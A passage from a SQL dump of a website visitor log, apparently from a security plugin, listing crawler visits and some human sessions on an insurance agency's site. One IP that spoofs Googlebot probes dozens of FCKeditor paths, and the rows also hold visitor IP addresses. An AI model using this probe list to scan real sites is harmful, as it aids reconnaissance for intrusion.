+http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22071,'0b_d5ca2b59b17f52e9f8924cb8096f9923','1461827522','66.249.64.34','crawl-66-249-64-34.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22073,'0b_3b124ac13ca60d57c5e3f362d6ce70d1','1461828966','81.17.30.86','81.17.30.86','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinVista x64','Firefox 15','ua','','','','','','','0','0',0),(22076,'0b_1b799841226d62bd9f783999509f7af5','1461831568','52.71.157.13','ec2-52-71-157-13.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36','','',0,'Win7','Chrome 28','','','','','','','','0','0',0),(22079,'0b_9c1bf1eab1f79d905abec98e80abd43d','1461832760','69.30.213.138','69.30.213.138','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(22080,'0b_9c1bf1eab1f79d905abec98e80abd43d','1461832772','69.30.213.138','69.30.213.138','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22082,'0b_9c1bf1eab1f79d905abec98e80abd43d','1461832783','69.30.213.138','69.30.213.138','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22083,'0b_9c1bf1eab1f79d905abec98e80abd43d','1461832797','69.30.213.138','69.30.213.138','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22086,'0b_9c1bf1eab1f79d905abec98e80abd43d','1461832808','69.30.213.138','69.30.213.138','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22089,'0b_9c1bf1eab1f79d905abec98e80abd43d','1461832820','69.30.213.138','69.30.213.138','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22091,'0b_f6bd5c604c584d551e99caef4f86ba9f','1461834508','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22092,'0b_dcaffc6545e62b71bcb0aabf0243e043','1461840454','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(22095,'0b_dcaffc6545e62b71bcb0aabf0243e043','1461840457','100.43.81.152','spider-100-43-81-152.yandex.com','/term-quotes/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(22098,'0b_ccdf7e78b7028ff1b6e98af8bde05dfa','1461840471','208.115.111.66','208-115-111-66-reverse.wowrack.com','/meet-the-eib-team/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22101,'0b_cc96cc730e57bf09d5fd9464cc727308','1461841165','221.231.6.195','221.231.6.195','/Administrator/FCKeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22104,'0b_cc96cc730e57bf09d5fd9464cc727308','1461841169','221.231.6.195','221.231.6.195','[404] /Administrator/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22106,'0b_cc96cc730e57bf09d5fd9464cc727308','1461841176','221.231.6.195','221.231.6.195','[404] /_fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22107,'0b_cc96cc730e57bf09d5fd9464cc727308','1461841180','221.231.6.195','221.231.6.195','[404] /admin/editor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22109,'0b_cc96cc730e57bf09d5fd9464cc727308','1461841185','221.231.6.195','221.231.6.195','[404] /admin/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22112,'0b_cc96cc730e57bf09d5fd9464cc727308','1461841191','221.231.6.195','221.231.6.195','[404] /common/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22115,'0b_7191ac332822d3af5b4127c4553a5667','1461841201','221.231.6.195','221.231.6.195','/editor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22118,'0b_7191ac332822d3af5b4127c4553a5667','1461841206','221.231.6.195','221.231.6.195','[404] /fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22119,'0b_7191ac332822d3af5b4127c4553a5667','1461841212','221.231.6.195','221.231.6.195','[404] /js/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22121,'0b_7191ac332822d3af5b4127c4553a5667','1461841217','221.231.6.195','221.231.6.195','[404] /include/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22122,'0b_7191ac332822d3af5b4127c4553a5667','1461841222','221.231.6.195','221.231.6.195','[404] /FCKEditorV2/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22124,'0b_7191ac332822d3af5b4127c4553a5667','1461841227','221.231.6.195','221.231.6.195','[404] /FCKeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22127,'0b_7191ac332822d3af5b4127c4553a5667','1461841235','221.231.6.195','221.231.6.195','[404] /admin/js/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22128,'0b_7191ac332822d3af5b4127c4553a5667','1461841240','221.231.6.195','221.231.6.195','[404] /fck/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22130,'0b_7191ac332822d3af5b4127c4553a5667','1461841245','221.231.6.195','221.231.6.195','[404] /Fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22131,'0b_7191ac332822d3af5b4127c4553a5667','1461841254','221.231.6.195','221.231.6.195','[404] /Fckeditornew/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22133,'0b_7191ac332822d3af5b4127c4553a5667','1461841256','221.231.6.195','221.231.6.195','[404] /Fckeditorold/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22134,'0b_7191ac332822d3af5b4127c4553a5667','1461841263','221.231.6.195','221.231.6.195','[404] /Public/Js/FCKeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22137,'0b_7191ac332822d3af5b4127c4553a5667','1461841267','221.231.6.195','221.231.6.195','[404] /Uploadfiles/fck/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22140,'0b_7191ac332822d3af5b4127c4553a5667','1461841273','221.231.6.195','221.231.6.195','[404] /Uploadfiles/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22142,'0b_7191ac332822d3af5b4127c4553a5667','1461841279','221.231.6.195','221.231.6.195','[404] /Web/FCKeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22143,'0b_7191ac332822d3af5b4127c4553a5667','1461841286','221.231.6.195','221.231.6.195','[404] /WebSite/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22146,'0b_7191ac332822d3af5b4127c4553a5667','1461841291','221.231.6.195','221.231.6.195','[404] /admin/fck/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22149,'0b_7191ac332822d3af5b4127c4553a5667','1461841296','221.231.6.195','221.231.6.195','[404] /admin/system/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22152,'0b_7191ac332822d3af5b4127c4553a5667','1461841305','221.231.6.195','221.231.6.195','[404] /admin/view/javascript/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22155,'0b_7191ac332822d3af5b4127c4553a5667','1461841311','221.231.6.195','221.231.6.195','[404] /admin/wo_edit/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22158,'0b_7191ac332822d3af5b4127c4553a5667','1461841321','221.231.6.195','221.231.6.195','[404] /admin_bg/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22160,'0b_7191ac332822d3af5b4127c4553a5667','1461841327','221.231.6.195','221.231.6.195','[404] /ckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22161,'0b_7191ac332822d3af5b4127c4553a5667','1461841332','221.231.6.195','221.231.6.195','[404] /ecmseditor/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22164,'0b_7191ac332822d3af5b4127c4553a5667','1461841341','221.231.6.195','221.231.6.195','[404] /editor/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22167,'0b_7191ac332822d3af5b4127c4553a5667','1461841345','221.231.6.195','221.231.6.195','[404] /editor1/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22169,'0b_7191ac332822d3af5b4127c4553a5667','1461841350','221.231.6.195','221.231.6.195','[404] /editorold/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22170,'0b_7191ac332822d3af5b4127c4553a5667','1461841356','221.231.6.195','221.231.6.195','[404] /editors/FCKeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22172,'0b_7191ac332822d3af5b4127c4553a5667','1461841361','221.231.6.195','221.231.6.195','[404] /ejuyfckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22175,'0b_7191ac332822d3af5b4127c4553a5667','1461841366','221.231.6.195','221.231.6.195','[404] /expansion/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22178,'0b_7191ac332822d3af5b4127c4553a5667','1461841374','221.231.6.195','221.231.6.195','[404] /fk/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22179,'0b_7191ac332822d3af5b4127c4553a5667','1461841380','221.231.6.195','221.231.6.195','[404] /guestbook/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22181,'0b_7191ac332822d3af5b4127c4553a5667','1461841385','221.231.6.195','221.231.6.195','[404] /html/fck/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22184,'0b_7191ac332822d3af5b4127c4553a5667','1461841391','221.231.6.195','221.231.6.195','[404] /html/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22185,'0b_7191ac332822d3af5b4127c4553a5667','1461841396','221.231.6.195','221.231.6.195','[404] /inc/fck/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22188,'0b_7191ac332822d3af5b4127c4553a5667','1461841402','221.231.6.195','221.231.6.195','[404] /inc/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22191,'0b_7191ac332822d3af5b4127c4553a5667','1461841412','221.231.6.195','221.231.6.195','[404] /includes/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22193,'0b_7191ac332822d3af5b4127c4553a5667','1461841417','221.231.6.195','221.231.6.195','[404] /lib/FCKeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22196,'0b_7191ac332822d3af5b4127c4553a5667','1461841422','221.231.6.195','221.231.6.195','[404] /mag/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22199,'0b_7191ac332822d3af5b4127c4553a5667','1461841431','221.231.6.195','221.231.6.195','[404] /manage/editor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22200,'0b_7191ac332822d3af5b4127c4553a5667','1461841436','221.231.6.195','221.231.6.195','[404] /manage/fck/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22203,'0b_7191ac332822d3af5b4127c4553a5667','1461841441','221.231.6.195','221.231.6.195','[404] /manage/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22205,'0b_7191ac332822d3af5b4127c4553a5667','1461841450','221.231.6.195','221.231.6.195','[404] /scripts/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22206,'0b_7191ac332822d3af5b4127c4553a5667','1461841455','221.231.6.195','221.231.6.195','[404] /server/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22209,'0b_7191ac332822d3af5b4127c4553a5667','1461841461','221.231.6.195','221.231.6.195','[404] /siteadmin/FCKeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22212,'0b_7191ac332822d3af5b4127c4553a5667','1461841470','221.231.6.195','221.231.6.195','[404] /sscms/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22214,'0b_7191ac332822d3af5b4127c4553a5667','1461841474','221.231.6.195','221.231.6.195','[404] /sysadmin/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22215,'0b_7191ac332822d3af5b4127c4553a5667','1461841482','221.231.6.195','221.231.6.195','[404] /system/application/plugins/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22218,'0b_7191ac332822d3af5b4127c4553a5667','1461841487','221.231.6.195','221.231.6.195','[404] /system/ext/FCKeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22221,'0b_7191ac332822d3af5b4127c4553a5667','1461841493','221.231.6.195','221.231.6.195','[404] /system/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22224,'0b_7191ac332822d3af5b4127c4553a5667','1461841498','221.231.6.195','221.231.6.195','[404] /textarea/fck/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22227,'0b_7191ac332822d3af5b4127c4553a5667','1461841503','221.231.6.195','221.231.6.195','[404] /tools/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22230,'0b_7191ac332822d3af5b4127c4553a5667','1461841509','221.231.6.195','221.231.6.195','[404] /tyopfckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22233,'0b_7191ac332822d3af5b4127c4553a5667','1461841518','221.231.6.195','221.231.6.195','[404] /webadmin/FCKeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22236,'0b_7191ac332822d3af5b4127c4553a5667','1461841523','221.231.6.195','221.231.6.195','[404] /html/js/editor/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22238,'0b_7191ac332822d3af5b4127c4553a5667','1461841528','221.231.6.195','221.231.6.195','[404] /_admin/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22241,'0b_7191ac332822d3af5b4127c4553a5667','1461841535','221.231.6.195','221.231.6.195','[404] /public/js/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22242,'0b_7191ac332822d3af5b4127c4553a5667','1461841539','221.231.6.195','221.231.6.195','[404] /webmanage/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22245,'0b_7191ac332822d3af5b4127c4553a5667','1461841544','221.231.6.195','221.231.6.195','[404] /agents/fckeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22247,'0b_7191ac332822d3af5b4127c4553a5667','1461841550','221.231.6.195','221.231.6.195','[404] /webeditor/fckeditor.js','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','3','0',0),(22248,'0b_162ed813cd23ce993bd6d055c6c20cf7','1461841854','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22250,'0b_bdc025fc6100c86588f6286fc6327fd9','1461845251','180.76.15.141','baiduspider-180-76-15-141.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(22251,'0b_7ee128ca5610aa48cd70c76c8b42f0f8','1461846457','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22254,'0b_55391acd03f9c14e4e11841ea02acbfc','1461847846','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22257,'0b_2c9bb77ef91d2e5b62c46c57b068e60a','1461848967','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22259,'0b_6e47780ec7542a4abcc3f6ff7a4b2da4','1461849313','207.46.13.82','msnbot-207-46-13-82.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(22262,'0b_6e47780ec7542a4abcc3f6ff7a4b2da4','1461849461','207.46.13.82','msnbot-207-46-13-82.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22263,'0b_0c7da2aaf1fd64797a60af26cc324b08','1461851455','76.184.168.34','cpe-76-184-168-34.tx.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','','',0,'Win7 x64','Firefox 45','us','1093 x 614','','','','','','0','0',0),(22266,'0b_0c7da2aaf1fd64797a60af26cc324b08','1461851498','76.184.168.34','cpe-76-184-168-34.tx.res.rr.com','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','https://www.empireins.com/','',0,'Win7 x64','Firefox 45','us','1093 x 614','','','','','','0','0',0),(22269,'0b_0c7da2aaf1fd64797a60af26cc324b08','1461851721','76.184.168.34','cpe-76-184-168-34.tx.res.rr.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','https://www.empireins.com/forms/','',0,'Win7 x64','Firefox 45','us','1093 x 614','','','','','','0','51',0),(22272,'0b_0c7da2aaf1fd64797a60af26cc324b08','1461851731','76.184.168.34','cpe-76-184-168-34.tx.res.rr.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','https://www.empireins.com/contact/','',0,'Win7 x64','Firefox 45','us','1093 x 614','','','','','','0','51',0),(22274,'0b_0c7da2aaf1fd64797a60af26cc324b08','1461851736','76.184.168.34','cpe-76-184-168-34.tx.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','https://www.empireins.com/about-us/','',0,'Win7 x64','Firefox 45','us','1093 x 614','','','','','','0','51',0),(22277,'0b_0c7da2aaf1fd64797a60af26cc324b08','1461851748','76.184.168.34','cpe-76-184-168-34.tx.res.rr.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','https://www.empireins.com/','',0,'Win7 x64','Firefox 45','us','1093 x 614','','','','','','0','51',0),(22280,'0b_689f62e7a03fd3ddd5ba7b399c6ed908','1461852901','76.184.168.34','cpe-76-184-168-34.tx.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','','',0,'Win7 x64','Firefox 45','us','1093 x 614','','','','','','0','0',0),(22281,'0b_689f62e7a03fd3ddd5ba7b399c6ed908','1461852956','76.184.168.34','cpe-76-184-168-34.tx.res.rr.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','https://www.empireins.com/','',0,'Win7 x64','Firefox 45','us','1093 x 614','','','','','','0','0',0),(22283,'0b_689f62e7a03fd3ddd5ba7b399c6ed908','1461852982','76.184.168.34','cpe-76-184-168-34.tx.res.rr.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','','',0,'Win7 x64','Firefox 45','us','1093 x 614','','','','','','0','51',0),(22286,'0b_e3c86de43c854938ddc93185a20479a4','1461853884','68.179.74.193','static-68-179-74-193.ptr.terago.net','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','fr','','','','','','','0','0',0),(22289,'0b_e3c86de43c854938ddc93185a20479a4','1461853886','68.179.74.193','static-68-179-74-193.ptr.terago.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','fr','','','','','','','0','0',0),(22292,'0b_11740473af6eb4d46ee6b21239700339','1461855021','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22293,'0b_b91293d2d31809b5fd0a0d7e49c67245','1461855906','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22296,'0b_b91293d2d31809b5fd0a0d7e49c67245','1461855916','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22298,'0b_b91293d2d31809b5fd0a0d7e49c67245','1461855935','184.154.139.23','placeholder.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; 